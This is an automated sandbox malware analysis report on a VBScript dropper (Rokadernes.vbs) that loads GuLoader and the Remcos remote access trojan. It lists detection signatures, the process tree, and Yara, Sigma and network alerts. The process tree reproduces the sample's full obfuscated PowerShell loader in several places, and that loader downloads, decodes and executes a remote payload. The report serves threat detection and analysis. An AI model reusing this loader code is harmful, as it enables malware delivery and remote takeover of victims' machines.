Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rokadernes.vbs

Overview

General Information

Sample name:Rokadernes.vbs
Analysis ID:1579623
MD5:693321a98dce16a4369d750bac3c4fb0
SHA1:cadf2497394e79cfd3c02a4f5bbb1adb6503d29c
SHA256:d719392462e09d59474cafa8d7b107d4e3063a664a51e87c5e2b750cf100be69
Tags:GuLoadervbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Creates autostart registry keys with suspicious names
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6740 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Teks$ BotUFrkht AnfiProtl Fo bThesj ElgeOpnalP epiRet,gTran.UndiDDechoVu kwblsdn MillVggeoImmaaE sodP odFDueliLandlT gseData( He $Ski I.ermnHypojRegiuEularWondi RejesystsPiezaShamgWine,Comp$Boc MbanqoLydidHetevencaiFinanVaredTonse ontnSpid)';$Modvinden=$asymptotes;Myndiges (Katukina 'M.no$OpsugSediLgramO oodBN miaaab.LRoma:Su pDDaemeDecoTMaskABufoi TanLAudisKal tCrocUSkruDHatiI TjsE Ex.2Merc3Un i9o.er=Taen(Du,aTIsotESulfSHaanT Und-hyppp FruaMisstBaroH Awk s nd$ DozmBirsoSelvD aryV peaIUnepNS,ruDC ltEPicaN ,pl)');while (!$Detailstudie239) {Myndiges (Katukina 'Mois$Er lg ndklKonso Telb bnoaRadil Sur:FullSBrdfmUdryaUnculanhehFeriac sslUnaws gleegrupnSpigsU vi=Tri,$sandE rekfbankf njaeEn.in') ;Myndiges $Frivoliteten142;Myndiges (Katukina 'DelfsRo fTMatraNecrRBuegtRejs-ApplSU siLGla.eTituE Ra,pBrs For4');Myndiges (Katukina 'Heft$KombgLux.lFainoSexcB redA.nhaLForm:,advD PeteEuphtK otABefaiOpgalPakkSSolftAandu .enDMe aI No.E Do.2Over3Poli9 ri= ele(WhenTfilmEK stSBortT ul- BrepDebrAK,hotMen,H Pos Pe,u$NatimManioJo,dDAtteVWasti equnFo sD PhoeM stN U d)') ;Myndiges (Katukina ' oko$PseuG Disl ovoKonobAssea To.LSien:Sccjp Skrrops EOutseSwardUtiluKobbc arbaMesoTWhemePre dNedr=Gang$UningConcLEthnOPrecbS ccaHemiLAthl:LeveG K peAudiOIndbT VanrPhreoMiskpPolyITa.ssForumBer +Kred+Grov%Vile$ModecTeknHJadeoGranklgtnSFrusTForuA.harRPanhT,owlEStarrTvrenMobbEViol.TarocFo ooI dhUInten O et') ;$Injuriesag=$Chokstarterne[$Preeducated]}$Planeta=299772;$Makrokaldene218=31361;Myndiges (Katukina 'Vand$KortG BrnLslavOM ttBstorAA skLTiam:Di,ii AffD.kulyA laXPr.eKSrmrADggeT ekAInteLAc ioCairgSkureEyesR Hal Fja= rfe Vi.GBedueTrimtAfsl-ReteC UnmOPatenKultTProcETmreN let Bri Axin$,stemB reOMis,DB civGaudIShouNti tDB evESprjN');Myndiges (Katukina 'Exin$SnusgStral ZefoEnorb xya D,jl Omb:SterPDiscr Dego UsirLockeSubcxtu f Fors= Sta Semi[GumiSCeney PrisIdrttS lpeEx lmPark.GlosCKanooPe.cnAffiv pane delrF,rhtheks]Pers: wro:SammF CherIlmaoDisim Un BMus aStras Reke etr6vrng4 EmpSTelet Bl rNulzinonpnSalogPear(Bran$PeriIUnatdHer yForsx TilkDemia UnctAlk aI.eqlEurooSk.agFremeSkrarFaja)');Myndiges (Katukina 'Gra $,albgTripl reo UniBSe saErfaL C m:Rapij rbeA eeVS,teATilbnDaane aure lu6Tunn7Op n V.sc=Sand Besa[AfhoS NapyGlutsMiscTS.eae inuMfej . HertCroce VagXSkaltMe.v. DeseS ifNChilCRepoOEgetd KenImodsnHa dGs vk]Ant,: O s:G.ayaAnt s AddCBra,i R bISkr .Ge oGJenhEIndsTAnimsUndeT UndRAdspiNonwnUnwhgD.ta(Hy o$HovePMi,lR NovoIndlRUds Ew,neXIndr)');Myndiges (Katukina 'Offi$BrutgpettLBolioBandbano,aMajoLFly :AffakCentA Sktl,attDSkaaaLim,E GrueSkrmrRampeProa= her$ P.lj B raGen VFremaRetinHalmePresEgro,6 .ot7Mure. SupsImpuU KonB FugsLossT BelRMenaiDiscNAs,igFlos(Modu$Unmip Pa lfarmaPropn MimEViolT,ervAMeni,De.e$ToptmInteaBakskA ocr TknOEm.iKStifaSkylL excdBa,oESecrn Crie Hjh2Fo,m1Zing8 For)');Myndiges $Kaldaeere;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 764 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Teks$ BotUFrkht AnfiProtl Fo bThesj ElgeOpnalP epiRet,gTran.UndiDDechoVu kwblsdn MillVggeoImmaaE sodP odFDueliLandlT gseData( He $Ski I.ermnHypojRegiuEularWondi RejesystsPiezaShamgWine,Comp$Boc MbanqoLydidHetevencaiFinanVaredTonse ontnSpid)';$Modvinden=$asymptotes;Myndiges (Katukina 'M.no$OpsugSediLgramO oodBN miaaab.LRoma:Su pDDaemeDecoTMaskABufoi TanLAudisKal tCrocUSkruDHatiI TjsE Ex.2Merc3Un i9o.er=Taen(Du,aTIsotESulfSHaanT Und-hyppp FruaMisstBaroH Awk s nd$ DozmBirsoSelvD aryV peaIUnepNS,ruDC ltEPicaN ,pl)');while (!$Detailstudie239) {Myndiges (Katukina 'Mois$Er lg ndklKonso Telb bnoaRadil Sur:FullSBrdfmUdryaUnculanhehFeriac sslUnaws gleegrupnSpigsU vi=Tri,$sandE rekfbankf njaeEn.in') ;Myndiges $Frivoliteten142;Myndiges (Katukina 'DelfsRo fTMatraNecrRBuegtRejs-ApplSU siLGla.eTituE Ra,pBrs For4');Myndiges (Katukina 'Heft$KombgLux.lFainoSexcB redA.nhaLForm:,advD PeteEuphtK otABefaiOpgalPakkSSolftAandu .enDMe aI No.E Do.2Over3Poli9 ri= ele(WhenTfilmEK stSBortT ul- BrepDebrAK,hotMen,H Pos Pe,u$NatimManioJo,dDAtteVWasti equnFo sD PhoeM stN U d)') ;Myndiges (Katukina ' oko$PseuG Disl ovoKonobAssea To.LSien:Sccjp Skrrops EOutseSwardUtiluKobbc arbaMesoTWhemePre dNedr=Gang$UningConcLEthnOPrecbS ccaHemiLAthl:LeveG K peAudiOIndbT VanrPhreoMiskpPolyITa.ssForumBer +Kred+Grov%Vile$ModecTeknHJadeoGranklgtnSFrusTForuA.harRPanhT,owlEStarrTvrenMobbEViol.TarocFo ooI dhUInten O et') ;$Injuriesag=$Chokstarterne[$Preeducated]}$Planeta=299772;$Makrokaldene218=31361;Myndiges (Katukina 'Vand$KortG BrnLslavOM ttBstorAA skLTiam:Di,ii AffD.kulyA laXPr.eKSrmrADggeT ekAInteLAc ioCairgSkureEyesR Hal Fja= rfe Vi.GBedueTrimtAfsl-ReteC UnmOPatenKultTProcETmreN let Bri Axin$,stemB reOMis,DB civGaudIShouNti tDB evESprjN');Myndiges (Katukina 'Exin$SnusgStral ZefoEnorb xya D,jl Omb:SterPDiscr Dego UsirLockeSubcxtu f Fors= Sta Semi[GumiSCeney PrisIdrttS lpeEx lmPark.GlosCKanooPe.cnAffiv pane delrF,rhtheks]Pers: wro:SammF CherIlmaoDisim Un BMus aStras Reke etr6vrng4 EmpSTelet Bl rNulzinonpnSalogPear(Bran$PeriIUnatdHer yForsx TilkDemia UnctAlk aI.eqlEurooSk.agFremeSkrarFaja)');Myndiges (Katukina 'Gra $,albgTripl reo UniBSe saErfaL C m:Rapij rbeA eeVS,teATilbnDaane aure lu6Tunn7Op n V.sc=Sand Besa[AfhoS NapyGlutsMiscTS.eae inuMfej . HertCroce VagXSkaltMe.v. DeseS ifNChilCRepoOEgetd KenImodsnHa dGs vk]Ant,: O s:G.ayaAnt s AddCBra,i R bISkr .Ge oGJenhEIndsTAnimsUndeT UndRAdspiNonwnUnwhgD.ta(Hy o$HovePMi,lR NovoIndlRUds Ew,neXIndr)');Myndiges (Katukina 'Offi$BrutgpettLBolioBandbano,aMajoLFly :AffakCentA Sktl,attDSkaaaLim,E GrueSkrmrRampeProa= her$ P.lj B raGen VFremaRetinHalmePresEgro,6 .ot7Mure. SupsImpuU KonB FugsLossT BelRMenaiDiscNAs,igFlos(Modu$Unmip Pa lfarmaPropn MimEViolT,ervAMeni,De.e$ToptmInteaBakskA ocr TknOEm.iKStifaSkylL excdBa,oESecrn Crie Hjh2Fo,m1Zing8 For)');Myndiges $Kaldaeere;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6804 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • remcos.exe (PID: 7096 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • remcos.exe (PID: 2688 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • remcos.exe (PID: 4348 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000003.00000002.2057052918.0000000008E20000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000003.00000002.2057477084.000000000A0B8000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000003.00000002.2036593483.000000000604E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_2504.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_764.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc2d1:$b2: ::FromBase64String(
              • 0xb34c:$s1: -join
              • 0x4af8:$s4: +=
              • 0x4bba:$s4: +=
              • 0x8de1:$s4: +=
              • 0xaefe:$s4: +=
              • 0xb1e8:$s4: +=
              • 0xb32e:$s4: +=
              • 0x15731:$s4: +=
              • 0x157b1:$s4: +=
              • 0x15877:$s4: +=
              • 0x158f7:$s4: +=
              • 0x15acd:$s4: +=
              • 0x15b51:$s4: +=
              • 0xbb79:$e4: Get-WmiObject
              • 0xbd68:$e4: Get-Process
              • 0xbdc0:$e4: Start-Process
              • 0x163b3:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", ProcessId: 6740, ProcessName: wscript.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-6US4Y7
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.86.72, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6804, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", ProcessId: 6740, ProcessName: wscript.exe
              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6804, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-6US4Y7
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Te

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-23T06:41:44.226095+010028032702Potentially Bad Traffic192.168.2.449737104.21.86.72443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6804, type: MEMORYSTR
              AI detected suspicious sample
